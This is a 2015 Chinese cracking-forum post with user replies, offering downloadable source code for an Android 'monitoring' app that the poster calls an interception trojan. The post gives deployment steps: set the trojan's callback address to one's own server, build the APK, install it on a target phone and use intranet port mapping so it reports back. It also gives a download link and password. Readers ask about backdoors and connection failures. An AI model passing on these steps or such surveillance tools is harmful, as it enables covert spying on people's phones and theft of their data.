吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

注册[Register]

QQ登录

只需一步,快速开始

[易语言 转载] 安卓手机监控软件附带源码,来来来,上次欠大家的源码!

文少 发表于 2015-7-7 18:00

软件开头动画!
软件界面!
不要把拦截马生成出来就安装,要修改上线地址。下载E4A把上线地址修改成你的上线地址然后生成APK文件安装到手机就可以了,内网映射后上线OK
软件源码:链接:http://pan.baidu.com/s/1sj5KqCH 密码:wys7

禁止刮刮乐 速去学习下:http://www.52pojie.cn/thread-369146-1-1.html  发表于 2015-7-7 18:52

免费评分

zjj106415 + 1 点错,不小心踩了,不好意思

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

yeheimao 发表于 2016-2-9 00:19
源码呢?楼主。想来看看,是不是源码删除了呢。我下载了 有远控的 没有这个手机的啊?麻烦发个连接 谢谢
笑傲浆糊 发表于 2015-7-7 18:02 来自手机
头像被屏蔽
killall 发表于 2015-7-7 18:05
头像被屏蔽
bilibili 发表于 2015-7-7 18:05
九九八十一 发表于 2015-7-7 18:09
2个手机都得安装?
良宵花弄月 发表于 2015-7-7 18:32
怕有后门,不敢测试,求小白
丨丨流氓兔 发表于 2015-7-7 18:37
楼主你太牛逼了  少个模块
zc181 发表于 2015-7-7 18:41
我测试了一天  就是上线不了 到底是哪里出了问题
广龙123456 发表于 2015-7-7 18:43 来自手机
真不敢试,安全否?
淡然出尘 发表于 2015-7-7 19:06
全程易语言 我也是醉了